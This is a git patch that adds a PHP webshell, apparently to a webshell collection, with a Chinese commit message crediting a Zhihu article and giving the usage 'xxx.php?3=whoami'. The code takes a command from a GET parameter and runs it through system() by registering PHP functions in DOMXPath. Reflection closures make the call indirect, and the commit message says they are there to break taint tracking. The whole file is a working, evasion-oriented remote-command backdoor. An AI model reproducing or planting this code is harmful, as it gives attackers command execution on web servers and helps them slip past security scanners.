From c9540e5a85df9d140c61b76a157633736c6a53ea Mon Sep 17 00:00:00 2001
From: tennc <670357+tennc@users.noreply.github.com>
Date: Mon, 22 Aug 2022 22:32:44 +0800
Subject: [PATCH] Create system2022-08-22.php
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

from : https://zhuanlan.zhihu.com/p/550150061
该样本需要一些条件，前提是开启了php-xml拓展才可以，其原理就是用XML去注册一个registerPHPFunctions，也就是我们想要执行的system再利用getClosure去触发该方法而构成的webshell，其中即利用到了PHP的特性，利用registerNamespace和registerPHPFunctions来中断污点追踪，从而RCE
usage: xxx.php?3=whoami
---
 php/system2022-08-22.php | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 php/system2022-08-22.php

diff --git a/php/system2022-08-22.php b/php/system2022-08-22.php
new file mode 100644
index 0000000..ac0db97
--- /dev/null
+++ b/php/system2022-08-22.php
@@ -0,0 +1,24 @@
+<?php
+// dom and xml needed, install php-xml and leave php.ini as default.
+// Author:LemonPrefect
+$cmd = $_GET[3];
+$_REQUEST[1] = "//book[php:functionString('system', '$cmd') = 'PHP']";
+$_REQUEST[2] = ["php", "http://php.net/xpath"];
+$xml = <<< XML
+<?xml version="1.0" encoding="UTF-8"?>
+<books>
+    <book>
+        <title>We are the champions</title>
+        <author>LemonPrefect</author>
+        <author>H3h3QAQ</author>
+    </book>
+</books>
+XML;
+​
+$doc = new DOMDocument;
+$doc->loadXML($xml);
+$clazz = (new ReflectionClass("DOMXPath"));
+$instance = $clazz->newInstance($doc);
+$clazz->getMethod("registerNamespace")->getClosure($instance)->__invoke(...$_REQUEST[2]);
+$clazz->getMethod("registerPHPFunctions")->invoke($instance);
+$clazz->getMethod("query")->getClosure($instance)->__invoke($_REQUEST[1]);